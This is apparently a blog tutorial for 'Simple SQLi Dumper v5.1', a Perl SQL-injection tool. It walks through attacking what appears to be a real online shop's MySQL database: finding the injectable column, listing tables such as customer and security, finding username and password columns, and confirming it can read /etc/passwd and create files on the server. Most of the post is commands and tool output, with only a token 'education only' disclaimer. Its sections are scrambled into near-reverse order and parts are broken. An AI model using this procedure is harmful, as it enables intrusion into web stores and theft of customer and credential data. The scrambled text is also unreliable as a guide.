#DOORKS DE TIENDAS SQLI DUMPER HOW TO#
search column name (-find) now i'll show you how to use -find option (Search Columns Name) i'll try to search column with keyword "address" it require -c option (column) # perl -u -d -c -find :D ok i have show you how to find magic number, table, column and dump data the column using SSDp. dumping data now we'll see information inside that column. security(1): user_id,username,password,admin,last_login Done.Īha! we got column called "username" and "password". finding column let's see column from table called "security". That is the list of all table in database() order() order_item(261) order_source(5) order_status(4) order_type(2) payment_type(4) product(30) product_group(17) security(1) shopping_cart(0) user_session(68) Done. aspect_ratio(2) audio_format(3) category(7) customer(200) deposit(11) discount_group(9) discount_group_price(10) finding table now we use URL that include "c0li" string on it to find table & column. we can see the database information and operation system too. Our magic number is 1 and it will replace with "c0li" string. Database: 460store User: Version: 5.0.51a-log System: redhat-linux-gnu Access to "mysql" Database: No Read File "/etc/passwd": Yes (w00t) Create File "/tmp/c0li-430.txt": Yes (w00t) Done. noge]# perl -u -magic = | Simple SQLi Dumper v5.1 | | Coded by Vrs-hCk | = Help Command: -h, -help, -help URL: End Tag: -Attempting to find the magic nu mber. null column used for execute our SQL query. first of all we have to find null column (magic number). | -e sql injection end tag (default: "-") | | -d this option should not be used (default: | | -t table_name | | -c column_name (example: id,user,pass,email) | | -s SPACE code: +,/**/,%20 (default: "+") | | -f max field to get magic number (default: 123) | | -start row number to begin dumping data | | -stop row number to stop dumping | | -where your special dumping query | || | -info Get MySQL Information | | -dbase Concat Databases | | -table Concat Tables | | -column Concat Columns | | -tabcol Concat Tables with Columns | | -find Search Columns Name | | -magic Find Magic Number | | -dump Dump Data | | -brute Fuzzing Tables & Columns | || | -log file name to save ssdp data (default: ssdp.log) | | -p hostname:port | |-| noge]# perl -h |-|-| -| | Usage: perl | || | -u target with id parameter or sqli url with c0li string | SQL Injection - Operation System Function - Dump Database - Extract Database Schema - Search Columns Name - Read File (read only) - Create File (read only) - Brute Table & Column SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database. USE IT AT YOUR OWN RISK!! SSDp coded by Vrs-hCk ( anderantisecurityorg anderantisecurityorg ) SSDp How To by NoGe ( marioantisecurityorg marioantisecurityorg ) WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL. USE THIS TOOL FOR EDUCATION PURPOSE ONLY. SIMPLE SQLI DUMPER V5.1 Maby NoGe in Labels:vulnerabilities,linux,tutorial,mixed Labels:vulnerabilities,linux,tutorial,mixed tutorial 0
0 kommentar(er)
